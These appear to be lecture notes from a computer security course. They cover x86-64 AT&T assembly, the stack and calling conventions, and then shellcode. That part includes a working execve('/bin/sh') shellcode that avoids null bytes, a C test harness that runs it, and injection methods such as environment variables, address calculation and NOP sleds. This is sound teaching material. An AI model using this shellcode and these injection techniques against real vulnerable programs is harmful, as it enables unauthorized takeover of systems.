Lecture 6: assembly, shellcode exploits

Assembly

We use x86-64 assembly in AT&T notation (personal note: I find Intel notation nicer to use, though).

operand order: source, destination (Intel has the opposite)
prefixes mark the operand type: % for registers, $ for constants (Intel doesn’t have those)
# for comments (Intel uses ;)
mnemonic suffix specifies operand size: b for byte, w for word (16 bits), l for long (32 bits), q for quad (64 bits) (Intel doesn’t do this)
- the suffix is optional if one of the operands is a register (the size is inferred from the register)

Low-level, processor-specific symbolic language, directly translated to machine code.

Instructions: simple operations like mov %rax, %rbx (copies the value from register rax to register rbx)

form: mnemonic source, destination (mnemonic is short code telling CPU what to do)
number and type of operands depends on instruction, may be implicit
operand types:
- register: %rax, %rsp, or %al
  - small, fast storage locations inside the CPU
  - types:
    - general purpose (to some extent): %rax, %rbx, %rcx, %rdx, %rsi, %rdi, %r8-%r15
    - stack pointer: %rsp
    - frame/base pointer: %rbp
    - flags register
    - instruction pointer: %rip
    - segment registers: %cs, %ds, %es, %fs, etc.
    - system registers, model specific registers
    - instruction set registers
  - default register is 64-bit, can use smaller parts: %eax (32-bit), %ax (16-bit), %ah (8 high bits of %ax), %al (low 8 bits of %ax)
- memory: 0x401000, 8(%rbp), (%rdx, %rcx, 4)
  - max one explicit memory operand allowed
  - accessed by dereferencing pointers
  - specified as offset(base, index, scale)
    - computes and derefs offset+base+index*scale
    - base, index: 64-bit registers
      - if %rip, symbolic displacement is relative to next instruction
    - offset: 32-bit constant or symbol, default 0
    - scale: 1, 2, 4, or 8 (default 1)
    - all parts optional
- constants/immediates: prefixed with $ (e.g. $42)
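
The address arithmetic behind offset(base, index, scale) can be written out in C. This is only a sketch of the computation: the function name effective_address is made up for illustration, and the register contents are passed in as plain integers.

```c
#include <assert.h>
#include <stdint.h>

/* Models the address that offset(base, index, scale) refers to.
 * Hypothetical helper for illustration, not part of any real API. */
static uint64_t effective_address(int32_t offset, uint64_t base,
                                  uint64_t index, unsigned scale)
{
    /* Only these four scale factors can be encoded. */
    assert(scale == 1 || scale == 2 || scale == 4 || scale == 8);
    /* The 32-bit offset is sign-extended to 64 bits before it is added. */
    return base + index * scale + (uint64_t)(int64_t)offset;
}
```

With %rbp holding 0x1000, 8(%rbp) corresponds to effective_address(8, 0x1000, 0, 1). With %rdx holding 0x2000 and %rcx holding 3, (%rdx, %rcx, 4) corresponds to effective_address(0, 0x2000, 3, 4).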

Directives: commands for assembler

.data: section with variables
.text: section with code
.byte/.word/.long/.quad: integer (8/16/32/64 bits)
.ascii/.asciz: outputs string (without/with null terminator)

labels: create symbol at current address (foo: .byte 42 is similar to global char foo = 42)
comments: prefixed with #

Endianness: when storing an integer in memory, which byte is stored first

little-endian: least significant byte first (used by Intel)
big-endian: most significant byte first
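
To make the two byte orders concrete, here is a small C sketch that writes the same 32-bit value both ways. The helper names (store_le32, store_be32, host_is_little_endian) are invented for this example.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Writes v into out[0..3] least significant byte first (little-endian). */
static void store_le32(uint32_t v, uint8_t out[4])
{
    assert(out != NULL);
    for (int i = 0; i < 4; i++)
        out[i] = (uint8_t)(v >> (8 * i));
}

/* Writes v into out[0..3] most significant byte first (big-endian). */
static void store_be32(uint32_t v, uint8_t out[4])
{
    assert(out != NULL);
    for (int i = 0; i < 4; i++)
        out[i] = (uint8_t)(v >> (8 * (3 - i)));
}

/* Returns 1 if the machine running this code stores integers little-endian. */
static int host_is_little_endian(void)
{
    uint32_t v = 1;
    uint8_t first;
    memcpy(&first, &v, 1);   /* look at the byte stored at the lowest address */
    return first == 1;
}
```

For 0x11223344, store_le32 produces the bytes 44 33 22 11 and store_be32 produces 11 22 33 44. On an x86 machine host_is_little_endian() should report 1.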

Signed integers:

Intel stores signed ints in 2’s complement (the most significant bit counts as negative: in 8 bits it is worth -128 instead of +128)
to flip sign, flip all bits and add 1
most operations identical between signed/unsigned, except:
- comparisons need different condition code
- different instructions for mul/div
to cast a signed integer to a larger size, use sign extension (most significant bit copied into all new bits)
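
The two rules above (negate by flipping all bits and adding 1, widen by copying the top bit) can be checked with a short C sketch. It works on unsigned integers so the bit patterns stay visible; twos_negate and sign_extend are illustrative names, not library functions.

```c
#include <assert.h>
#include <stdint.h>

/* Flips the sign of a two's complement value: flip all bits, add 1. */
static uint64_t twos_negate(uint64_t x)
{
    return ~x + 1;
}

/* Treats the low `bits` bits of value as a signed integer and widens it
 * to 64 bits by copying its most significant bit into all new bits. */
static uint64_t sign_extend(uint64_t value, unsigned bits)
{
    assert(bits >= 1 && bits <= 64);
    if (bits == 64)
        return value;
    uint64_t low_mask = ((uint64_t)1 << bits) - 1;
    uint64_t sign_bit = (uint64_t)1 << (bits - 1);
    value &= low_mask;
    return (value & sign_bit) ? (value | ~low_mask) : value;
}
```

For example, the 8-bit pattern 0xFB is -5, and sign_extend(0xFB, 8) yields 0xFFFFFFFFFFFFFFFB, which is -5 as a 64-bit value. The positive pattern 0x7F is left unchanged.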

Common instructions:

example	meaning
mov src, dst	dst = src
xchg dst1, dst2	swap dst1 and dst2
push src	store src on top of stack
pop dst	remove value from top of stack and store in dst
add src, dst	dst += src
sub src, dst	dst -= src
inc dst	dst += 1
dec dst	dst -= 1
neg dst	dst = -dst
cmp src1, src2	set flags based on src2-src1
and src, dst	dst &= src
or src, dst	dst |= src
xor src, dst	dst ^= src
not dst	dst = ~dst
test src1, src2	set flags based on src1 & src2
jmp addr	jump to addr
call addr	push return address, jump to function at addr
ret	pop return address, return there
syscall	enter kernel to perform system call (based on registers)
lea src, dst	dst = &src (src must be in memory)
nop	do nothing

Conditional branching instructions (insert ‘n’ before the condition for the opposite, e.g. jne = jump if not equal; dst and src refer to the operands of the preceding cmp src, dst)

example	meaning
je addr; jz addr	jump if result == 0
jb addr	jump if dst < src (unsigned)
ja addr	jump if dst > src (unsigned)
jl addr	jump if dst < src (signed)
jg addr	jump if dst > src (signed)
js addr	jump if result < 0 (signed)
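
Why signed and unsigned comparisons need different condition codes is easier to see with the flags written out. The sketch below models cmp on 64-bit values and the standard flag conditions for the jumps in the table. The struct and function names are made up for this example.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* The four status flags the conditional jumps above depend on. */
struct flags {
    bool zf;  /* zero: result == 0 */
    bool sf;  /* sign: most significant bit of the result */
    bool cf;  /* carry: the unsigned subtraction needed a borrow */
    bool of;  /* overflow: the signed result did not fit */
};

/* Models `cmp src, dst` (AT&T order): computes dst - src, keeps only flags. */
static struct flags cmp_flags(uint64_t src, uint64_t dst)
{
    uint64_t result = dst - src;
    struct flags f;
    f.zf = (result == 0);
    f.sf = (result >> 63) != 0;
    f.cf = dst < src;
    f.of = (((dst ^ src) & (dst ^ result)) >> 63) != 0;
    assert(f.zf == (src == dst));   /* sanity check on the model itself */
    return f;
}

static bool taken_je(struct flags f) { return f.zf; }
static bool taken_jb(struct flags f) { return f.cf; }
static bool taken_ja(struct flags f) { return !f.cf && !f.zf; }
static bool taken_jl(struct flags f) { return f.sf != f.of; }
static bool taken_jg(struct flags f) { return !f.zf && f.sf == f.of; }
static bool taken_js(struct flags f) { return f.sf; }
```

Comparing dst = 0xFFFFFFFFFFFFFFFF with src = 1 shows the difference: ja is taken because the unsigned value is huge, while jl is taken because the same bits read as -1 in a signed comparison.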

Stack:

top of stack identified by stack pointer %rsp
entries on stack always 64 bits
push and pop implicitly use and update %rsp
stack grows downwards (push decrements %rsp by 8, pop increments %rsp by 8)
call and ret push/pop return address
function sets up stack frame in prologue, restores caller’s stack frame in epilogue (but note: this depends on calling convention)
small parameters stored in registers (%rdi, %rsi, %rdx, %rcx, %r8, %r9), other parameters on stack right-to-left (but note: this depends on calling convention)
function prologue:
1. push %rbp
2. set %rbp to %rsp
3. push the callee-saved registers the function uses (%rbx, %r12-%r15)
4. decrement %rsp to make space for local vars
5. save parameters to local variables if needed
function epilogue:
1. save return value (if any) in %rax
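2. release local vars by moving %rsp back up to the saved registers (if none were pushed, this is simply setting %rsp to %rbp)
3. pop callee-saved registers (in reverse order of the pushes)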
4. pop %rbp
5. return to caller (uses top-of-stack as return address)
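
The stack mechanics above can be traced with a toy model in C. This is a sketch under simplifying assumptions: %rsp and %rbp are byte offsets into a small array rather than real addresses, the frame has no callee-saved registers (so the epilogue can simply copy %rbp back into %rsp), and all names are invented for illustration.

```c
#include <assert.h>
#include <stdint.h>

#define STACK_BYTES 512

/* Toy model: a block of memory used as the stack, plus %rsp and %rbp.
 * Both registers hold byte offsets into mem rather than real addresses. */
struct machine {
    uint64_t mem[STACK_BYTES / 8];
    uint64_t rsp;
    uint64_t rbp;
};

static void machine_init(struct machine *m)
{
    m->rsp = STACK_BYTES;   /* empty stack: %rsp just past the highest slot */
    m->rbp = STACK_BYTES;
}

/* push: decrement %rsp by 8, then store at the new top of stack. */
static void push(struct machine *m, uint64_t value)
{
    assert(m->rsp >= 8);
    m->rsp -= 8;
    m->mem[m->rsp / 8] = value;
}

/* pop: load from the top of stack, then increment %rsp by 8. */
static uint64_t pop(struct machine *m)
{
    assert(m->rsp + 8 <= STACK_BYTES);
    uint64_t value = m->mem[m->rsp / 8];
    m->rsp += 8;
    return value;
}

/* Prologue: save the caller's %rbp, start a new frame, reserve locals. */
static void prologue(struct machine *m, uint64_t local_bytes)
{
    push(m, m->rbp);
    m->rbp = m->rsp;
    assert(local_bytes % 8 == 0 && local_bytes <= m->rsp);
    m->rsp -= local_bytes;
}

/* Epilogue: drop the locals, then restore the caller's %rbp. */
static void epilogue(struct machine *m)
{
    m->rsp = m->rbp;
    m->rbp = pop(m);
}
```

A call is modelled as push(&m, return_address) followed by prologue. After epilogue, the top of the stack is the return address again, which is exactly the slot an overflow of a local buffer can reach.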

Shellcode

Assume we:

found vulnerability that allows overwriting return address
crafted input to trigger vulnerability

Where do we point return address?

code that’s already in program
code that we inject into the program

x86 CPUs don’t distinguish code and data, so if memory permissions allow:

we can read/write program code as data
we can execute data as program code

How do we inject code into program?

specify as parameter
specify as environment variable
provide as input (if input stored in buffer)

Injected code must:

work regardless of where it’s stored in memory
not depend on external code like libraries
not contain any null bytes (a null byte would end the input early if it is handled as a C string)
do something that gives attacker control of system
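
The null-byte requirement is easy to check mechanically. The sketch below scans a byte sequence for 0x00 and applies it to two encodings that both put 0x3b into %rax. The byte values are the standard x86 encodings of the instructions named in the comments; contains_null_byte and the array names are illustrative.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Returns 1 if any of the len bytes of code is 0x00, otherwise 0. */
static int contains_null_byte(const unsigned char *code, size_t len)
{
    assert(code != NULL);
    return memchr(code, 0, len) != NULL;
}

/* movl $0x3b, %eax: the 32-bit immediate carries three zero bytes. */
static const unsigned char mov_imm32[] = { 0xb8, 0x3b, 0x00, 0x00, 0x00 };

/* xorl %eax, %eax ; movb $0x3b, %al: same value in %rax, no zero bytes. */
static const unsigned char xor_then_movb[] = { 0x31, 0xc0, 0xb0, 0x3b };
```

contains_null_byte(mov_imm32, sizeof mov_imm32) reports a null byte, while the xor/movb variant passes. This is why shellcode tends to build constants out of small pieces instead of loading them directly.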

User code can’t start program, kernel does that. So tell kernel to do something using a syscall:

special instruction to switch to kernel
based on params stored in registers or memory, kernel performs required task
kernel returns to our program
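
From C, the same mechanism can be observed through the syscall() function that glibc provides on Linux. This sketch assumes a Linux system and uses that wrapper only to make the mechanism visible. Shellcode cannot rely on libc and has to execute the syscall instruction itself. The helper names are made up.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Asks the kernel for our process ID via the raw getpid system call. */
static long raw_getpid(void)
{
    return syscall(SYS_getpid);
}

/* Writes msg to file descriptor fd via the raw write system call.
 * Returns the number of bytes written, or -1 on error. */
static long raw_write(int fd, const char *msg)
{
    assert(msg != NULL);
    return syscall(SYS_write, fd, msg, strlen(msg));
}
```

In both helpers the first argument to syscall() selects the system call, which corresponds to the number placed in %rax, and the remaining arguments are the parameters the kernel reads from registers.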

Starting a shell:

need execve system call to start program (the shell)
want to call execve("/bin/sh", argv, NULL), where char *argv[] = { "/bin/sh", NULL }
how without shared libraries (libc)?
- %rax holds the number of the system call to invoke; 0x3b is execve
- syscall switches to the kernel; the result is stored in %rax after it returns
- retq returns to the caller
so shellcode requirements are:
- string “/bin/sh” in memory
- array in memory, with pointer to “/bin/sh” and NULL pointer
- pointer to string in %rdi (program name)
- pointer to array in %rsi (argv)
- NULL pointer in %rdx (envp)
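
For comparison, this is roughly what the shellcode has to reproduce, written in C with libc available. It is a sketch, not the exploit itself: fill_shell_argv and start_shell are hypothetical names, and the shellcode has to build the same string and array by hand.

```c
#include <assert.h>
#include <stddef.h>
#include <unistd.h>

/* The program to start; its address is what ends up in %rdi. */
static char shell_path[] = "/bin/sh";

/* Fills argv with { "/bin/sh", NULL }; its address is what ends up in %rsi. */
static void fill_shell_argv(char *argv[2])
{
    assert(argv != NULL);
    argv[0] = shell_path;
    argv[1] = NULL;
}

/* Replaces the current process with a shell; only returns on failure. */
int start_shell(void)
{
    char *argv[2];
    fill_shell_argv(argv);
    return execve(shell_path, argv, NULL);   /* envp = NULL, as in %rdx */
}
```

Calling start_shell() from a test program should drop into a shell. If execve fails, it returns -1 and the program continues.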

Shellcode:

.data
.globl shellcode
shellcode:
    jmp code_start
string_addr:
    .ascii "/bin/shNAAAAAAAABBBBBBBB"
code_start:
    leaq string_addr(%rip), %rdi    # load address of the string into %rdi ('path' in execve), offset is negative to avoid null bytes
    xorl %eax, %eax                 # clear %rax without using null bytes
    movb %al, 0x07(%rdi)            # replace "N" in string with null, use %al to avoid explicit null
    movq %rdi, 0x08(%rdi)           # store pointer to program name in argv[0] (overwrites the A's)
    movq %rax, 0x10(%rdi)           # store null in argv[1] (overwrites the B's), use %rax to avoid explicit null
    leaq 0x08(%rdi), %rsi           # load address of argv into %rsi
    movq %rax, %rdx                 # load null into %rdx ('envp' in execve), use %rax to avoid explicit null
    movb $0x3b, %al                 # load syscall number into %rax, 0x3b is execve, we already xored %rax so other bytes are zero
    syscall                         # perform call 0x3b(%rdi, %rsi, %rdx)
    .byte 0
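
The effect of the three stores on the 24-byte data area can be replayed in C. This sketch assumes 64-bit pointers. patch_layout is an invented helper that performs the same writes the shellcode does through %rdi.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define LAYOUT_SIZE 24  /* "/bin/sh" + 'N' + 8 x 'A' + 8 x 'B' */

/* Applies to buf the same three stores the shellcode performs via %rdi. */
static void patch_layout(unsigned char buf[LAYOUT_SIZE])
{
    assert(buf != NULL);
    uint64_t self = (uint64_t)(uintptr_t)buf;   /* value %rdi would hold */
    uint64_t zero = 0;                          /* value of %rax after xorl */

    buf[0x07] = 0;                              /* movb %al,  0x07(%rdi) */
    memcpy(buf + 0x08, &self, sizeof self);     /* movq %rdi, 0x08(%rdi) */
    memcpy(buf + 0x10, &zero, sizeof zero);     /* movq %rax, 0x10(%rdi) */
}
```

Starting from the bytes "/bin/shNAAAAAAAABBBBBBBB", the buffer afterwards holds the null-terminated string "/bin/sh" at offset 0, a pointer to that string at offset 8 (argv[0]), and a null pointer at offset 16 (argv[1]).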

Testing shellcode:

#include <stdio.h>
int main(int argc, char **argv) {
    extern char shellcode;
    void (*f)(void) = (void (*)(void)) &shellcode; // cast pointer to shellcode to function pointer to 'void shellcode(void)'
    f();
    fprintf(stderr, "this shouldn't print\n");
    return -1;
}

Injecting the shellcode:

assume the shellcode is injected via an environment variable
- injection in a command line argument is similar
- injection in input data is harder, but can use similar techniques (create and analyze a program similar to the vulnerable program)
- one solution is a NOP sled: jumping anywhere into a sequence of NOPs ends up at the first instruction after it, so the return address only has to be approximately right
if we specify the shellcode as an env variable, we can compute its address: bottom_of_stack-8-(strlen(progname)+1)-(strlen(shellcode)+1)
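
Both ideas fit in a few lines of C. The sketch below assumes the shellcode is the last string in the environment and that bottom_of_stack is known (for example 0x7ffffffff000 on x86-64 Linux with address randomization disabled, an assumption not stated in the notes). The function names are invented for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Address of the last environment string, following the formula above. */
static uint64_t env_string_address(uint64_t bottom_of_stack,
                                   const char *progname,
                                   const char *env_entry)
{
    assert(progname != NULL && env_entry != NULL);
    return bottom_of_stack - 8
         - (strlen(progname) + 1)
         - (strlen(env_entry) + 1);
}

/* Fills out[0..total) with NOPs (0x90) and places the code at the end,
 * so a jump to any of the NOPs slides into the code. */
static void build_nop_sled(unsigned char *out, size_t total,
                           const unsigned char *code, size_t code_len)
{
    assert(out != NULL && code != NULL && code_len <= total);
    memset(out, 0x90, total - code_len);
    memcpy(out + (total - code_len), code, code_len);
}
```

For a program started as /tmp/vuln with a 4-byte payload, env_string_address(0x7ffffffff000, "/tmp/vuln", "AAAA") gives 0x7fffffffefe9. When the address cannot be computed exactly, a sled in front of the code widens the range of return addresses that still work.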

Computer and Network Security
